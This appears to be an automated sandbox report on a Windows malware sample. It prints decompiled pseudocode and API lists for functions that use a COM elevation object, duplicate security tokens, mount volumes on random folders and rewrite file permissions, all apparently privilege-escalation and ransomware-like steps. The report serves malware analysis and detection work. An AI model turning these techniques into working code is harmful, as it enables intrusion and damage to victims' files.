                                                                                        • Opcode Fuzzy Hash: 282238462acdf5acc471cb7da1bb4f9528e7c10fa6baeaeda1a475af4ee8dc6a
                                                                                        • Instruction Fuzzy Hash: A7315D71D00209AFDB219FA1DE0ABAE7B75FB04304F10403AF601715E1DB761A5ADB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
                                                                                        			E004024C1(intOrPtr _a4) {
                                                                                        				intOrPtr _v20;
                                                                                        				void _v40;
                                                                                        				long _v560;
                                                                                        				void* _t24;
                                                                                        				void* _t25;
                                                                                        				void* _t26;
                                                                                        
                                                                                        				_t26 = E00401D08(0x40cf47);
                                                                                        				_t25 = E00401D08(0x40cf85);
                                                                                        				wcscpy( &_v560, _t26);
                                                                                        				wcscat( &_v560, _t25);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t25);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t26);
                                                                                        				memset( &_v40, 0, 0x24);
                                                                                        				_v40 = 0x24;
                                                                                        				_v20 = 4;
                                                                                        				_t24 = E00401D08(0x40cfd7);
                                                                                        				 *0x40f890( &_v560,  &_v40, _t24, _a4);
                                                                                        				return RtlFreeHeap( *0x40f5d6, 0, _t24);
                                                                                        			}

                                                                                        Instruction addresses of the decompiled statements above, in order: 0x004024d9, 0x004024e5, 0x004024ef, 0x00402500, 0x00402512, 0x00402521, 0x0040252f, 0x00402538, 0x0040253f, 0x00402550, 0x00402561, 0x0040257e

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • wcscpy.NTDLL ref: 004024EF
                                                                                        • wcscat.NTDLL ref: 00402500
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402512
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402521
                                                                                        • memset.NTDLL ref: 0040252F
                                                                                        • CoGetObject.OLE32(?,00000024,00000000,004025AF), ref: 00402561
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402570
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateObjectmemsetwcscatwcscpy
                                                                                        • String ID: $
                                                                                        • API String ID: 2323637184-3993045852
                                                                                        • Opcode ID: b3310a9516806f475f99f0fe9cf5f333df13000ef1b4d81828e3b0836d30b519
                                                                                        • Instruction ID: 3b0b86d69b12ddca7a1691911cbadea849a7ccc3a35efded6c453c494278c5a2
                                                                                        • Opcode Fuzzy Hash: b3310a9516806f475f99f0fe9cf5f333df13000ef1b4d81828e3b0836d30b519
                                                                                        • Instruction Fuzzy Hash: DC118272900208BBD720ABA0FD4EF9E3BACEB48711F100576F600B10A0D67659198B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00407153(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12) {
                                                                                        				long _v8;
                                                                                        				int _t18;
                                                                                        				long _t27;
                                                                                        				void* _t34;
                                                                                        				intOrPtr _t35;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_t35 = _a8;
                                                                                        				_t18 = wcslen(_t35 + 4);
                                                                                        				_t34 = RtlAllocateHeap( *0x40f5d6, 8, 0x12 + (_t18 + wcslen(_a12)) * 2);
                                                                                        				if(_t34 != 0) {
                                                                                        					 *_t34 = 0x5c005c;
                                                                                        					 *((intOrPtr*)(_t34 + 4)) = 0x5c003f;
                                                                                        					 *((intOrPtr*)(_t34 + 8)) = 0x4e0055;
                                                                                        					 *((intOrPtr*)(_t34 + 0xc)) = 0x5c0043;
                                                                                        					wcscat(_t34, _t35 + 4);
                                                                                        					E00401A3A(_t34);
                                                                                        					wcscat(_t34, _a12);
                                                                                        					if(_a4 != 0) {
                                                                                        						E00401AE1(_a4);
                                                                                        					}
                                                                                        					_t27 = GetFileAttributesW(_t34);
                                                                                        					if(_t27 != 0xffffffff && SetFileAttributesW(_t34, _t27) != 0) {
                                                                                        						_v8 = 1;
                                                                                        					}
                                                                                        					if(_a4 != 0) {
                                                                                        						E00401B60();
                                                                                        					}
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _t34);
                                                                                        				}
                                                                                        				return _v8;
                                                                                        			}

Instruction addresses (column extracted from the listing above): 0x0040715e, 0x00407165, 0x0040716c, 0x0040719b, 0x0040719f, 0x004071a5, 0x004071ab, 0x004071b2, 0x004071b9, 0x004071c5, 0x004071cf, 0x004071d8, 0x004071e5, 0x004071ea, 0x004071ea, 0x004071f0, 0x004071f9, 0x00407207, 0x00407207, 0x00407212, 0x00407214, 0x00407214, 0x00407222, 0x00407222, 0x00407233

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040716C
                                                                                        • wcslen.NTDLL ref: 0040717A
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407195
                                                                                        • wcscat.NTDLL ref: 004071C5
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 004071D8
                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004071F0
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004071FD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407222
                                                                                          • Part of subcall function 00401AE1: NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
                                                                                          • Part of subcall function 00401AE1: NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
                                                                                          • Part of subcall function 00401AE1: NtClose.NTDLL(005C003F), ref: 00401B4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: wcslen$AttributesFileHeapwcscat$AllocateCloseDuplicateFreeInformationThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 2286005353-0
                                                                                        • Opcode ID: 0a8deabfdbdd6a5a1d26168d77fecfe75273a124673a983e3017bc5ea49e6f23
                                                                                        • Instruction ID: 5216cba3c5a82563622fdb12ffef802aad29dde6ed334a9f4abb9ac8d2484c4f
                                                                                        • Opcode Fuzzy Hash: 0a8deabfdbdd6a5a1d26168d77fecfe75273a124673a983e3017bc5ea49e6f23
                                                                                        • Instruction Fuzzy Hash: 7C21B3B0500304EFDB209FA4ED88F5A3BACFB00315F148939F815A62B1DB75E959CB69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040744D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00407466
                                                                                        • _swprintf.NTDLL ref: 00407478
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040748D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407722
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407739
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate_swprintfwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 793461835-0
                                                                                        • Opcode ID: 02988a6e1fed529179a56413732385f8f95b222a6e6ccc85a2f2f023d3b96e8f
                                                                                        • Instruction ID: 51fda382e1c4280d7ddda007286011f921d6c84c7e02d989648ca6b3ea8bccd1
                                                                                        • Opcode Fuzzy Hash: 02988a6e1fed529179a56413732385f8f95b222a6e6ccc85a2f2f023d3b96e8f
                                                                                        • Instruction Fuzzy Hash: 81418270900209EFDB219F94ED49BAEBB75FF04305F208036E501B61E1C77AA95ADF5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040744D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00407466
                                                                                        • _swprintf.NTDLL ref: 00407478
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040748D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407722
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407739
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate_swprintfwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 793461835-0
                                                                                        • Opcode ID: fcb9670295118b63f5052eff47242ec0f74a164052a575d7ab58542269b4ae6f
                                                                                        • Instruction ID: 51fda382e1c4280d7ddda007286011f921d6c84c7e02d989648ca6b3ea8bccd1
                                                                                        • Opcode Fuzzy Hash: fcb9670295118b63f5052eff47242ec0f74a164052a575d7ab58542269b4ae6f
                                                                                        • Instruction Fuzzy Hash: 81418270900209EFDB219F94ED49BAEBB75FF04305F208036E501B61E1C77AA95ADF5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 18%
                                                                                        			E00403BB0(intOrPtr _a4) {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				void* _v20;
                                                                                        				long _v24;
                                                                                        				long _v28;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v24 = 0;
                                                                                        				_v28 = 0;
                                                                                        				 *0x40f888(0);
                                                                                        				_v12 = E00401D08(0x40e74e);
                                                                                        				_v16 = E00401D08(0x40e762);
                                                                                        				_v20 = E00401D08(0x40e776);
                                                                                        				_push( &_v24);
                                                                                        				_push(_v16);
                                                                                        				_push(1);
                                                                                        				_push(0);
                                                                                        				_push(_v12);
                                                                                        				if( *0x40f898() == 0) {
                                                                                        					_push( &_v28);
                                                                                        					_push(_v20);
                                                                                        					_push(_v24);
                                                                                        					if( *((intOrPtr*)( *_v24))() == 0) {
                                                                                        						_push(0);
                                                                                        						_push(_a4);
                                                                                        						_push(_v28);
                                                                                        						if( *((intOrPtr*)( *_v28 + 0x14))() == 0) {
                                                                                        							_v8 = RtlAllocateHeap( *0x40f5d6, 8, 0x8000);
                                                                                        							if(_v8 != 0) {
                                                                                        								_push(0);
                                                                                        								_push(0);
                                                                                        								_push(0x4000);
                                                                                        								_push(_v8);
                                                                                        								_push(_v24);
                                                                                        								if( *((intOrPtr*)( *_v24 + 0xc))() != 0) {
                                                                                        									RtlFreeHeap( *0x40f5d6, 0, _v8);
                                                                                        									_v8 = 0;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        				if(_v28 != 0) {
                                                                                        					 *((intOrPtr*)( *_v28 + 8))(_v28);
                                                                                        				}
                                                                                        				if(_v24 != 0) {
                                                                                        					 *((intOrPtr*)( *_v24 + 8))(_v24);
                                                                                        				}
                                                                                        				 *0x40f88c();
                                                                                        				return _v8;
                                                                                        			}

Instruction addresses (column extracted from the listing above): 0x00403bbb, 0x00403bc2, 0x00403bc9, 0x00403bd2, 0x00403be2, 0x00403bef, 0x00403bfc, 0x00403c02, 0x00403c03, 0x00403c06, 0x00403c08, 0x00403c0a, 0x00403c15, 0x00403c1f, 0x00403c20, 0x00403c23, 0x00403c2a, 0x00403c31, 0x00403c33, 0x00403c36, 0x00403c3e, 0x00403c53, 0x00403c5a, 0x00403c61, 0x00403c63, 0x00403c65, 0x00403c6a, 0x00403c6d, 0x00403c75, 0x00403c82, 0x00403c88, 0x00403c88, 0x00403c75, 0x00403c5a, 0x00403c3e, 0x00403c2a, 0x00403c9a, 0x00403cab, 0x00403cbc, 0x00403cc6, 0x00403cd0, 0x00403cd0, 0x00403cd7, 0x00403ce1, 0x00403ce1, 0x00403ce4, 0x00403cf5

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00403BD2
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00008000), ref: 00403C4D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403C82
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408D46), ref: 00403C9A
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00403CAB
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00403CBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate$Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 1640397549-0
                                                                                        • Opcode ID: d4a1f2a4fc3cc9aa9fa2fabc02db46a3f971e8063bc2164fc8c46c92e2efe1df
                                                                                        • Instruction ID: e3dadd8eb797c7b19ebca9e0442eb91f9782e03a6c7c290a79183afb30ae0f31
                                                                                        • Opcode Fuzzy Hash: d4a1f2a4fc3cc9aa9fa2fabc02db46a3f971e8063bc2164fc8c46c92e2efe1df
                                                                                        • Instruction Fuzzy Hash: D141E771A00209FFEB219F90DD4ABAEBB75FF04701F204179E600B62A0D7756A55DB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 55%
                                                                                        			E00406B24(intOrPtr _a4) {
                                                                                        				void* _v8;
                                                                                        				char _v28;
                                                                                        				void* _t20;
                                                                                        				intOrPtr* _t26;
                                                                                        				void* _t27;
                                                                                        				void* _t28;
                                                                                        
                                                                                        				_t26 =  &_v28;
                                                                                        				 *_t26 = 0x3a0043;
                                                                                        				 *((intOrPtr*)(_t26 + 4)) = 0x25005c;
                                                                                        				 *((intOrPtr*)(_t26 + 8)) = 0x250075;
                                                                                        				 *((intOrPtr*)(_t26 + 0xc)) = 0x5c0075;
                                                                                        				 *(_t26 + 0x10) = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v8 = RtlAllocateHeap( *0x40f5d6, 8, 0x80);
                                                                                        				if(_v8 == 0) {
                                                                                        					L7:
                                                                                        					return _v8;
                                                                                        				} else {
                                                                                        					goto L1;
                                                                                        				}
                                                                                        				while(1) {
                                                                                        					L1:
                                                                                        					_t20 = E004049F9();
                                                                                        					 *0x40f69c(_v8, _t26, _t20, _t27);
                                                                                        					_t28 = _t28 + 0x10;
                                                                                        					if(CreateDirectoryW(_v8, 0) != 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if( *[fs:0x34] != 0xb7) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v8);
                                                                                        						_v8 = 0;
                                                                                        						goto L7;
                                                                                        					}
                                                                                        				}
                                                                                        				_push(_a4);
                                                                                        				_push(_v8);
                                                                                        				if( *0x40f7c0() == 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _v8);
                                                                                        					_v8 = 0;
                                                                                        				}
                                                                                        				goto L7;
                                                                                        			}










                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000080), ref: 00406B68
                                                                                          • Part of subcall function 004049F9: GetTickCount.KERNEL32 ref: 00404A06
                                                                                          • Part of subcall function 004049F9: RtlRandom.NTDLL(0040F964), ref: 00404A16
                                                                                        • _swprintf.NTDLL ref: 00406B82
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00406B90
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00406BB4
                                                                                        • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 00406BC9
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00406BDE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateCountCreateDirectoryMountPointRandomTickVolume_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 101820272-0
                                                                                        • Opcode ID: 3cfb989db7807931fd826e3ed054d8a834d0ab16829a180cc7a3390b2ead4d46
                                                                                        • Instruction ID: e1b37034f326fe4f70f2fee52cf03571b882bad2b00ff06de1ec0b57b8cf0b62
                                                                                        • Opcode Fuzzy Hash: 3cfb989db7807931fd826e3ed054d8a834d0ab16829a180cc7a3390b2ead4d46
                                                                                        • Instruction Fuzzy Hash: 0E218EB1501208FFDB209F50DE49F9E7B74FB00715F108079E505BA1A0D7766A28EB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _allshr.NTDLL ref: 00406124
                                                                                        • _allshr.NTDLL ref: 00406232
                                                                                        • _alldiv.NTDLL(00000000,?,00000000), ref: 00406244
                                                                                        • _allmul.NTDLL(00000000,?,00200000,00000000), ref: 00406253
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: _allshr$_alldiv_allmul
                                                                                        • String ID:
                                                                                        • API String ID: 2318519744-0
                                                                                        • Opcode ID: ec3250a0b4dcfe5d13b4ee3031842530c6dc9307823f78fb5891440a3bac61f5
                                                                                        • Instruction ID: ed964a510cdfc7cd5c8e69f14ecb066afd3b3f1ebec39e60c687e42bb41a05ce
                                                                                        • Opcode Fuzzy Hash: ec3250a0b4dcfe5d13b4ee3031842530c6dc9307823f78fb5891440a3bac61f5
                                                                                        • Instruction Fuzzy Hash: DA212121E460A0DAF734310899687BBA116D782751F1B407F9E9B7A2C9CE3C0DF2119F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 40%
                                                                                        			E00402581() {
                                                                                        				int _v8;
                                                                                        				long _v12;
                                                                                        				void* _t15;
                                                                                        				void* _t26;
                                                                                        				wchar_t* _t31;
                                                                                        				wchar_t* _t32;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_t15 =  *0x40f888(0);
                                                                                        				if(_t15 == 0x54f) {
                                                                                        					return _t15;
                                                                                        				}
                                                                                        				E00402367();
                                                                                        				E004024C1( &_v12);
                                                                                        				if(_v12 != 0) {
                                                                                        					_t31 =  *0x40f5e2; // 0x7a0fe0
                                                                                        					_t26 = CommandLineToArgvW(_t31,  &_v8);
                                                                                        					if(_v8 != 1) {
                                                                                        						_t32 = wcsstr(_t31,  *(_t26 + 4));
                                                                                        						if( *((short*)(_t32 - 2)) != 0x20) {
                                                                                        							_t32 = _t32 - 2;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t32 = 0;
                                                                                        					}
                                                                                        					_push(0);
                                                                                        					_push(0);
                                                                                        					_push(0);
                                                                                        					_push(_t32);
                                                                                        					_push( *_t26);
                                                                                        					_push(_v12);
                                                                                        					if( *((intOrPtr*)( *_v12 + 0x24))() == 0) {
                                                                                        						 *((intOrPtr*)( *_v12 + 8))(_v12);
                                                                                        					}
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _t26);
                                                                                        				}
                                                                                        				return  *0x40f88c();
                                                                                        			}










                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00402590
                                                                                          • Part of subcall function 00402367: NtAllocateVirtualMemory.NTDLL(000000FF,0040F958,00000000,00001000,00003000,00000004), ref: 0040238D
                                                                                          • Part of subcall function 00402367: NtAllocateVirtualMemory.NTDLL(000000FF,0040F954,00000000,00001000,00003000,00000004), ref: 004023B4
                                                                                          • Part of subcall function 00402367: NtAllocateVirtualMemory.NTDLL(000000FF,0040F950,00000000,00001000,00003000,00000004), ref: 004023DB
                                                                                          • Part of subcall function 00402367: wcscpy.NTDLL ref: 0040241F
                                                                                          • Part of subcall function 00402367: wcscat.NTDLL ref: 0040242F
                                                                                          • Part of subcall function 00402367: wcslen.NTDLL ref: 0040244B
                                                                                          • Part of subcall function 00402367: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402468
                                                                                          • Part of subcall function 00402367: RtlEnterCriticalSection.NTDLL(?), ref: 00402478
                                                                                          • Part of subcall function 00402367: RtlInitUnicodeString.NTDLL(?), ref: 0040248B
                                                                                          • Part of subcall function 00402367: RtlInitUnicodeString.NTDLL(?), ref: 0040249B
                                                                                          • Part of subcall function 00402367: RtlLeaveCriticalSection.NTDLL(?), ref: 004024A4
                                                                                          • Part of subcall function 00402367: LdrEnumerateLoadedModules.NTDLL(00000000,00402322,00000030), ref: 004024B2
                                                                                          • Part of subcall function 004024C1: wcscpy.NTDLL ref: 004024EF
                                                                                          • Part of subcall function 004024C1: wcscat.NTDLL ref: 00402500
                                                                                          • Part of subcall function 004024C1: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402512
                                                                                          • Part of subcall function 004024C1: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402521
                                                                                          • Part of subcall function 004024C1: memset.NTDLL ref: 0040252F
                                                                                          • Part of subcall function 004024C1: CoGetObject.OLE32(?,00000024,00000000,004025AF), ref: 00402561
                                                                                          • Part of subcall function 004024C1: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402570
                                                                                        • CommandLineToArgvW.SHELL32(007A0FE0,004091CD,00000000), ref: 004025C0
                                                                                        • wcsstr.NTDLL ref: 004025D6
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402617
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$AllocateMemoryVirtual$CriticalInitSectionStringUnicodewcscatwcscpy$ArgvCommandEnterEnumerateInitializeLeaveLineLoadedModulesObjectmemsetwcslenwcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 2547784891-0
                                                                                        • Opcode ID: 49af22b765b8dde071d2fe5f232c9e19b86c4df1cc8ca3774b9d669a325484af
                                                                                        • Instruction ID: b770824f50c8b5cf821802ec8e57688202c9176f77eb22839bfd43197702f1f3
                                                                                        • Opcode Fuzzy Hash: 49af22b765b8dde071d2fe5f232c9e19b86c4df1cc8ca3774b9d669a325484af
                                                                                        • Instruction Fuzzy Hash: FC118F31900114BBDB20AFA0CE4DB8EBB78FF08305F5045B1E905B72E1D7B59A95CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000004,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000003), ref: 00405DDE
                                                                                        • SetEntriesInAclW.ADVAPI32(00000001,00405D91,00000000,00406716,?,?,?,00000003), ref: 00405DF6
                                                                                        • SetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000005,00405D85,00000000,00406716,00000000,?,?,?,00000003), ref: 00405E13
                                                                                        • RtlFreeHeap.NTDLL(00000000,00406716), ref: 00405E24
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: InfoNamedSecurity$EntriesFreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 2009802112-0
                                                                                        • Opcode ID: e3a6f7b4e6cce42dd5f9f4f0520d365aabef2ef6bd41bc1e1ff1099af3b3ce04
                                                                                        • Instruction ID: f9bdf760a515db76312524bfe0810a1d791a653e98f3678555cf95a32e712cf9
                                                                                        • Opcode Fuzzy Hash: e3a6f7b4e6cce42dd5f9f4f0520d365aabef2ef6bd41bc1e1ff1099af3b3ce04
                                                                                        • Instruction Fuzzy Hash: 60011232380208BAEB304B91ED4AFDB7B79EB44B11F504132B704B94E0E6B25A549A59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 68%
                                                                                        			E004064CC(wchar_t* _a4) {
                                                                                        				long _v8;
                                                                                        				wchar_t* _t10;
                                                                                        				void* _t12;
                                                                                        				signed int _t13;
                                                                                        				WCHAR* _t14;
                                                                                        				wchar_t* _t15;
                                                                                        				void* _t16;
                                                                                        				void* _t17;
                                                                                        				void* _t18;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				if( *0x40f5b2 != 0) {
                                                                                        					_t10 = wcsrchr(_a4, 0x5c);
                                                                                        					_t17 = _t16 + 8;
                                                                                        					 *_t10 = 0;
                                                                                        					_t14 = PathFindFileNameW(_a4);
                                                                                        					_t15 =  *0x40f5b2; // 0x7bf118
                                                                                        					while(1) {
                                                                                        						_t12 =  *0x40f694(_t15, _t14);
                                                                                        						_t18 = _t17 + 8;
                                                                                        						if(_t12 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_t13 = wcslen(_t15);
                                                                                        						_t17 = _t18 + 4;
                                                                                        						_t15 = _t15 + 2 + _t13 * 2;
                                                                                        						if( *_t15 != 0) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        						}
                                                                                        						goto L7;
                                                                                        					}
                                                                                        					_v8 = 1;
                                                                                        				}
                                                                                        				L7:
                                                                                        				return _v8;
                                                                                        			}

                                                                                        Instruction addresses (address column detached from the C-code lines above): 0x004064d7, 0x004064e5, 0x004064ec, 0x004064f2, 0x004064f5, 0x00406503, 0x00406505, 0x0040650b, 0x0040650d, 0x00406513, 0x00406518, 0x00000000, 0x00000000, 0x00406524, 0x0040652a, 0x0040652d, 0x00406535, 0x00000000, 0x00000000, 0x00406537, 0x00000000, 0x00406535, 0x0040651a, 0x0040651a, 0x0040653b, 0x00406546

                                                                                        APIs
                                                                                        Memory Dump Source
